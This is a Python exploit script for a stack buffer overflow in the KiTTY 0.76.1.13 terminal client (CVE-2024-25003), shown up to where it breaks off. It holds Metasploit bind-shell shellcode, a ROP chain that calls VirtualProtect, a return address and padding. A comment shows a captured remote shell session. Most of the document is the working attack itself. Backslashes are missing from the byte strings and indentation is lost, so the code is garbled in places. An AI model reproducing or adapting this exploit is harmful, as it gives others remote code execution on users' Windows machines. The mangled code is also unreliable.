# Exploit Title: KiTTY 0.76.1.13 - 'Start Duplicated Session Hostname' Buffer Overflow
# Exploit Author: DEFCESCO (Austin A. DeFrancesco)
# Vendor Homepage: https://github.com/cyd01/KiTTY/=
# Software Link: https://github.com/cyd01/KiTTY/releases/download/v0.76.1.13/kitty-bin-0.76.1.13.zip
# Version: ≤ 0.76.1.13
# Tested on: Microsoft Windows 11/10/8/7/XP
# CVE: 2024-25003
#-------------------------------------------------------------------------------------#
# Blog: https://blog.DEFCESCO.io/Hell0+KiTTY
#-------------------------------------------------------------------------------------#
# msf6 payload(windows/shell_bind_tcp) > to_handler #
# [*] Payload Handler Started as Job 1 #
# msf6 payload(windows/shell_bind_tcp) > #
# [*] Started bind TCP handler against 192.168.100.28:4444 #
# [*] Command shell session 1 opened (192.168.100.119:39315 -> 192.168.100.28:4444) #
#-------------------------------------------------------------------------------------#
import sys
import os
import struct
#---------------------------------------------------------------------------------------------#
# msf6 payload(windows/shell_bind_tcp) > generate -b 'x00x07x0ax0dx1bx9cx3Ax40' -f py #
# windows/shell_bind_tcp - 375 bytes #
# https://metasploit.com/ #
# Encoder: x86/xor_poly #
# VERBOSE=false, LPORT=4444, RHOST=192.168.100.28, #
# PrependMigrate=false, EXITFUNC=process, CreateSession=true, #
# AutoVerifySession=true #
#---------------------------------------------------------------------------------------------#
buf = b""
buf += b"x51x53x56x57xdbxd9xd9x74x24xf4x5fx41"
buf += b"x49x31xc9x51x59x90x90x81xe9xaexffxff"
buf += b"xffxbexd4xa1xc4xf4x31x77x2bx83xefxfc"
buf += b"x51x59x90xffxc9x75xf3x5fx5ex5bx59x28"
buf += b"x49x46xf4xd4xa1xa4x7dx31x90x04x90x5f"
buf += b"xf1xf4x7fx86xadx4fxa6xc0x2axb6xdcxdb"
buf += b"x16x8exd2xe5x5ex68xc8xb5xddxc6xd8xf4"
buf += b"x60x0bxf9xd5x66x26x06x86xf6x4fxa6xc4"
buf += b"x2ax8exc8x5fxedxd5x8cx37xe9xc5x25x85"
buf += b"x2ax9dxd4xd5x72x4fxbdxccx42xfexbdx5f"
buf += b"x95x4fxf5x02x90x3bx58x15x6exc9xf5x13"
buf += b"x99x24x81x22xa2xb9x0cxefxdcxe0x81x30"
buf += b"xf9x4fxacxf0xa0x17x92x5fxadx8fx7fx8c"
buf += b"xbdxc5x27x5fxa5x4fxf5x04x28x80xd0xf0"
buf += b"xfax9fx95x8dxfbx95x0bx34xfex9bxaex5f"
buf += b"xb3x2fx79x89xc9xf7xc6xd4xa1xacx83xa7"
buf += b"x93x9bxa0xbcxedxb3xd2xd3x5ex11x4cx44"
buf += b"xa0xc4xf4xfdx65x90xa4xbcx88x44x9fxd4"
buf += b"x5ex11x9exdcxf8x94x16x29xe1x94xb4x84"
buf += b"xc9x2exfbx0bx41x3bx21x43xc9xc6xf4xc5"
buf += b"xfdx4dx12xbexb1x92xa3xbcx63x1fxc3xb3"
buf += b"x5ex11xa3xbcx16x2dxccx2bx5ex11xa3xbc"
buf += b"xd5x28xcfx35x5ex11xa3x43xc9xb1x9ax99"
buf += b"xc0x3bx21xbcxc2xa9x90xd4x28x27xa3x83"
buf += b"xf6xf5x02xbexb3x9dxa2x36x5cxa2x33x90"
buf += b"x85xf8xf5xd5x2cx80xd0xc4x67xc4xb0x80"
buf += b"xf1x92xa2x82xe7x92xbax82xf7x97xa2xbc"
buf += b"xd8x08xcbx52x5ex11x7dx34xefx92xb2x2b"
buf += b"x91xacxfcx53xbcxa4x0bx01x1ax34x41x76"
buf += b"xf7xacx52x41x1cx59x0bx01x9dxc2x88xde"
buf += b"x21x3fx14xa1xa4x7fxb3xc7xd3xabx9exd4"
buf += b"xf2x3bx21"
def shellcode():
sc = b''
sc += b'xBBx44x24x44x44' # mov ebx,0x44442444
sc += b'xB8x44x44x44x44' # mov eax,0x44444444
sc += b'x29xD8' # sub eax,ebx
sc += b'x29xC4' # sub esp,eax
sc += buf
sc += b'x90' * (1052-len(sc))
assert len(sc) == 1052
return sc
def create_rop_chain():
# rop chain generated with mona.py - www.corelan.be
rop_gadgets = [
#[---INFO:gadgets_to_set_esi:---]
0x004c5832, # POP EAX # ADD ESP,14 # POP EBX # POP ESI # RETN [kitty.exe]
0x006424a4, # ptr to &VirtualProtect() [IAT kitty.exe]
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x00484e07, # MOV EAX,DWORD PTR DS:[EAX] # RETN [kitty.exe]
0x00473cf6, # XCHG EAX,ESI # RETN [kitty.exe]
#[---INFO:gadgets_to_set_ebp:---]
0x00429953, # POP EBP # RETN [kitty.exe]
0x005405b0, # push esp; ret 0 [kitty.exe]
#[---INFO:gadgets_to_set_ebx:---]
0x0049d9f9, # POP EBX # RETN [kitty.exe]
0x00000201, # 0x00000201-> ebx
#[---INFO:gadgets_to_set_edx:---]
0x00430dce, # POP EDX # RETN [kitty.exe]
0x00000040, # 0x00000040-> edx
#[---INFO:gadgets_to_set_ecx:---]
0x005ac58c, # POP ECX # RETN [kitty.exe]
0x004d81d9, # &Writable location [kitty.exe]
#[---INFO:gadgets_to_set_edi:---]
0x004fa404, # POP EDI # RETN [kitty.exe]
0x005a2001, # RETN (ROP NOP) [kitty.exe]
#[---INFO:gadgets_to_set_eax:---]
0x004cd011, # POP EAX # POP EBX # RETN [kitty.exe]
0x90909090, # nop
0x41414141, # Filler (compensate)
#[---INFO:pushad:---]
0x005dfbac, # PUSHAD # RETN [kitty.exe]
]
return b''.join(struct.pack('<I', _) for _ in rop_gadgets)
rop_chain = create_rop_chain()
#----------------------------------------------------------------------------------#
# Badchars: x00x07x0ax0dx1bx9cx3Ax40 #
# Return Address Information: 0x0052033c : {pivot 332 / 0x14c} : #
# ADD ESP,13C # POP EBX # POP ESI # POP EDI # POP EBP # RETN #
# ** [kitty.exe] ** | startnull,ascii {PAGE_EXECUTE_READWRITE} #
# Shellcode size at ESP: 1052 #
#----------------------------------------------------------------------------------#
return_address = struct.pack('<I', 0x0052033c) # ADD ESP,13C # POP EBX # POP ESI # POP EDI # POP EBP # RETN ** [kitty.exe] ** | startnull,ascii {PAGE_EXECUTE_READWRITE}
rop_chain_padding = b'x90' * 35
nops = b'x90' * 88
escape_sequence = b'